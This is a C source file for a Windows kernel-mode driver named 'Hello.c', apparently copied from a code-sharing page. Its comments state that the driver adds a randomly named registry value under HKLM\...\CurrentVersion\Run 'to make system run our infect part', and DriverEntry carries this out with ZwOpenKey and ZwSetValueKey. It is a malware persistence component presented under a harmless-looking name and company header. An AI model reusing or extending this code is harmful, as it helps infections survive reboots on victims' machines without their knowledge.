?? hello.c
字號:
/*******************************************************************
Copyright (c) 2003 Green Asia Electronics.
Module Name:
Hello.c
Current Version :
v0.1
Abstract:
Whole driver initialize code.
Environment:
kernel mode only
Functions:
DriverEntry :
Initialize code per driver.
XGWriter_DriverUnload :
Unload code per driver.
Notes:
Copyright (c) 2003 Green Asia Electronics. All Rights Reserved.
Revision History:
Year Month Day Author Version Comment
2003 09 14 HenryShow v0.1 first version
*******************************************************************/
///////////////////////////////////////////////////////////////////////////////////
#include "Hello.h"
///////////////////////////////////////////////////////////////////////////////////
/*******************************************************************
Current Version :
v0.1
Routine Prototype:
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
Routine Description:
Installable driver initialization entry point.
This entry point is called directly by the I/O system.
We use this entry point to add registry key to make system run our infect part.
Typically, we add a registry key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
and the key name and value are random, which is confirmed by infect part.
Arguments:
DriverObject - pointer to the driver object
RegistryPath - pointer to a unicode string representing the path
to driver-specific key in the registry
Return Value:
STATUS_SUCCESS if successful,
STATUS_UNSUCCESSFUL otherwise
Revision History:
Year Month Day Author Version Comment
2003 09 14 HenryShow v0.1 first version
*******************************************************************/
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS Status;
HANDLE RunKey;
OBJECT_ATTRIBUTES ObjAttr;
// we only interest about the registry.
ObjAttr.Length = sizeof(OBJECT_ATTRIBUTES);
ObjAttr.RootDirectory = NULL;
ObjAttr.ObjectName = &RegPath;
ObjAttr.Attributes = 0;
ObjAttr.SecurityDescriptor = NULL;
ObjAttr.SecurityQualityOfService = NULL;
Status = ZwOpenKey(&RunKey, KEY_ALL_ACCESS, &ObjAttr);
if (Status == STATUS_SUCCESS){
ZwSetValueKey(RunKey, &ValueName, 0, REG_SZ, RegKeyValue, sizeof(RegKeyValue) / sizeof(RegKeyValue[0]) * sizeof(WCHAR) );
ZwClose(RunKey);
}
DriverObject->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}
///////////////////////////////////////////////////////////////////////////////////
VOID
DriverUnload(
IN PDRIVER_OBJECT DriverObject
)
{
// To do : free all global variable's memory which are be allocated in DriverEntry.
}
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -